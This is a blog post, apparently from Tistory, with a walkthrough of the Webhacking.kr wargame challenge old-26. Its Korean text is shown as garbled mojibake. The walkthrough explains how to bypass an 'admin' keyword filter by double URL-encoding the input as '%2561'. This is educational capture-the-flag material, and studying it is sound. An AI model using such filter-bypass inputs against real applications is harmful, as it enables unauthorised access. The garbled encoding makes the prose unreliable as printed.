ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • Webhacking.kr :: old-26๋ฒˆ
    SECURITY/Webhacking 2021. 1. 25. 11:34

    ์ž…๋ ฅํ•˜๋Š” ๋ž€์ด ์•„๋ฌด๊ฒƒ๋„ ์—†์ง€๋งŒ,

    get ์œผ๋กœ id ๋ฅผ ๊ฐ€์ ธ์˜ค๋‹ˆ url ์ฐฝ์œผ๋กœ ์ž…๋ ฅ์„ ์ž‘์„ฑํ•  ์ˆ˜ ์žˆ๊ฒ ๋‹ค.

     

    ๊ทธ๋ƒฅ admin ์„ ๋„ฃ์–ด๋ณด์ž.

    ์—ญ์‹œ no! ๊ฐ€ ๋œฌ๋‹ค.

    ์ด์œ ๋Š” admin ์ด ์žˆ์œผ๋ฉด ๊ทธ๋ƒฅ no! ํ•œ๋‹ค..

    ๊ทผ๋ฐ ์ค‘๊ฐ„์— urldecode ํ•˜๊ณ  ๋‚˜์„œ admin ์ด๋ฉด solve ์ด๋‹ค!

     

    ๊ทธ๋Ÿฌ๋‹ˆ๊นŒ admin ์„ urlencode ํ•œ ๊ฑธ ์ž‘์„ฑํ•ด๋ณด์ž.

    a ์˜ percent encoding ๋ฌธ์ž๋Š” %61 ์ด๋‹ค.

     

    ์ด๊ฑธ ๋„ฃ์–ด์ฃผ๋ฉด..

    ์ด๊ฑฐ ์ž์ฒด๊ฐ€ URL ์ด๋‹ˆ๊นŒ ์ž๋™์œผ๋กœ admin ์œผ๋กœ ๋ฐ”๊ฟ”์„œ ๋„˜์–ด๊ฐ„๋‹ค.

     

     

    ๊ทธ๋Ÿฌ๋‹ˆ ์ด์ค‘์œผ๋กœ URL encoding ์„ ํ•ด์•ผ ํ•œ๋‹ค.

    ์ฆ‰, %61 ์„ URL Encoding ํ•œ ๊ฐ’์„ ๋„ฃ์–ด์ค˜์•ผ ํ•œ๋‹ค.

    ๊ทธ ๊ฐ’์€ %2561 ์ด๋‹ค.

    (JS ์—์„œ decodeURL(), encodeURL() ์„ ์ง€์›ํ•˜๋‹ˆ Chrome console ์—์„œ ์‰ฝ๊ฒŒ encode, decode ๋ฅผ ํ•  ์ˆ˜ ์žˆ๋‹ค.)

     

    ๊ทธ๊ฑธ ์ด์ œ URL ์ฐฝ์— ๋„ฃ์–ด์ค€๋‹ค.

    ํ’€์—ˆ๋‹ค!

    'SECURITY > Webhacking' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

    Webhacking.kr :: old-39๋ฒˆ  (0) 2021.01.25
    Webhacking.kr :: old-38๋ฒˆ  (0) 2021.01.25
    Webhacking.kr :: old-06๋ฒˆ  (0) 2021.01.25
    Webhacking.kr :: old-24๋ฒˆ  (0) 2021.01.25
    Webhacking.kr :: old-14๋ฒˆ  (0) 2021.01.25

    ๋Œ“๊ธ€

Designed by Tistory.